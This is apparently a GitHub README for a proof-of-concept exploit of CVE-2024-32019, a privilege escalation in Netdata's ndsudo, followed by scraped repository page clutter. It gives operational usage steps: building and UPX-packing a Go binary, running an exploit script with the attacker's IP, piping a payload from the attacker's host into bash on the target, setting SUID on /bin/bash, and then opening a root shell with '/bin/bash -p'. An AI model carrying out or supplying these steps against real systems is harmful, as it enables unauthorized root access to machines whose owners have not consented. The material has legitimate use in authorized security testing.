CVE-2024-32019-poc

Netdata ndsudo PoC

Build the binary:

go build -ldflags "-s -w" -o nvme poc.go
upx nvme

Run the bash script:

bash exploit.sh <YOUR IP>

In target machine run in a writable directory:

curl http://<YOUT IP>:8000/payload.sh | bash

It will automatically download the nvme binary, export the path, run ndsudo and add SUID to /bin/bash. Probably you need to change the ndsudo path in exploit.sh

To escalate privileges just run:

/bin/bash -p

Note:

The exploit is based in https://github.com/AzureADTrent/CVE-2024-32019-POC, when I tested it, I had the error:

execve: Exec format error

That's why I decided to create mine with Go.

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
LICENSE		LICENSE
README.md		README.md
exploit.sh		exploit.sh
poc.go		poc.go

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2024-32019-poc

Note:

About

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

CVE-2024-32019-poc

Note:

About

Topics

Resources

License

Uh oh!

Stars

Watchers

Forks

Contributors

Uh oh!

Languages